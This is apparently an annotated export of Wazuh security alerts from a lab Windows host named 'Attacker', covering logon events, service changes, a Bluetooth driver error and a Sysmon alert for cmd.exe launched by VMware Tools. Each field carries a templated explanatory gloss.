data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param1: Background Intelligent Transfer Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param2: auto start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param3: demand start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param4: BITS No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534844.2403086 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:47:24.340053+00:00 server1 sshd[3469]: pam_unix(sshd:session): session closed for user simba The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: sshd Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:47:24.340053+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
decoder.parent: pam Parent decoder used – for nested parsing.
decoder.name: pam Name of the Wazuh decoder that parsed this raw log.
data.dstuser: simba No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Agent event queue is back to normal load. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 205 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['wazuh', 'agent_flooding'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534852.2403479 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: wazuh: Agent buffer: 'normal'. The complete raw log message before parsing – last‑resort truth for deep dives.
decoder.parent: wazuh Parent decoder used – for nested parsing.
decoder.name: wazuh Name of the Wazuh decoder that parsed this raw log.
data.level: normal Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.
location: wazuh-agent Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 13 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534974.2403694 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:47:09.2829375Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2423 Incremental log record number – handy for timeline order.
data.win.system.processID: 9456 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:09Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-25T22:31:09Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534983.2405274 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:47:59.3887351Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43974 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 2444 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 14 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534984.2412611 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:48:07.3897224Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2425 Incremental log record number – handy for timeline order.
data.win.system.processID: 14384 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:31:07Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-25T22:31:07Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Windows System error event Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61102 Numeric ID of the detection rule that fired.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'system_error'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gpg13: ['4.3'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534985.2414193 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: BTHUSB No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 17 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:48:59.6557881Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 3055 Incremental log record number – handy for timeline order.
data.win.system.processID: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 10108 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: ERROR TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The local Bluetooth adapter has failed in an undetermined manner and will not be used. The driver has been unloaded." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.binary: 000000000100000000000000110005C0000000000000000000000000000000000000000000000000 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Windows command prompt started by an abnormal process Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92052 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.003'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Windows Command Shell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534985.2415577 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:48:59.7576790Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 344372 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:48:59.088
ProcessGuid: {94294ddc-bfdb-680a-a50c-000000000e00}
ProcessId: 3372
Image: C:\Windows\System32\cmd.exe
FileVersion: 10.0.26100.3624 (WinBuild.160101.0800)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""
CurrentDirectory: C:\WINDOWS\system32\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04
ParentProcessGuid: {94294ddc-ea88-67fe-4800-000000000e00}
ParentProcessId: 3220
ParentImage: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
ParentCommandLine: "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:48:59.088 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bfdb-680a-a50c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 3372 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\cmd.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3624 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows Command Processor No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: Cmd.Exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\WINDOWS\\system32\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4800-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3220 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534985.2421197 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:49:18.8658034Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43982 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 9532 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 2
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002
Account Name: Attcker1
Account Domain: Attacker
Logon ID: 0x31B4686
Linked Logon ID: 0x31C1A7D
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x624
Process Name: C:\Windows\System32\svchost.exe
Network Information:
Workstation Name: ATTACKER
Source Network Address: 127.0.0.1
Source Port: 0
Detailed Authentication Information:
Logon Process: User32
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-21-1227732096-2714569048-1995468811-1002 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x31b4686 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: User32 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.workstationName: ATTACKER No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x624 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.ipAddress: 127.0.0.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.ipPort: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x31c1a7d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534985.2428919 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
